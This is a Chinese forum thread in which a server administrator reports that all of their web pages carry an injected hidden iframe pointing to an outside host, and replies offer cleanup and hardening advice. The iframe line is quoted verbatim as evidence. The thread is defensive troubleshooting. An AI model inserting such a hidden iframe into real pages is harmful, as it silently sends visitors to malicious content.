1   1  /  1  页   跳转

关于网页挂马得防护

关于网页挂马得防护

我单位服务器上面有好几个网页,都被网页挂马了,症状是所有页面都包含
<iframe src="http://a.kx330.cn/wm/index.htm" width="100" height="0"></iframe>
瑞星杀毒无法查出问题。
请问如何根治?
---我们把所有网页中得这句话都手动删除,过两天自动又出来了。

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0)
分享到:
gototop
 

回复:关于网页挂马得防护

扫SRENG日志发这论坛来
下载SRENG2.6版工具:http://www.kztechs.com/sreng/download.html
SRENG工具的扫描日志操作,看这贴2楼:http://bbs.ikaka.com/showtopic-8442813.aspx
估计是服务器内有木马加载。
gototop
 

回复:关于网页挂马得防护

如果服务器上安装了IIS,尽量打全系统补丁,因为除了病毒修改外,也有可能是黑客利用IIS漏洞,远程修改你服务器上的网页文件。
gototop
 

回复:关于网页挂马得防护

也可以在C:\WINDOWS\system32\drivers\etc下面的host(记得用txt打开就可以了),然后网站前面加上127.0.0.1就可以阻止网站出现了!~
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT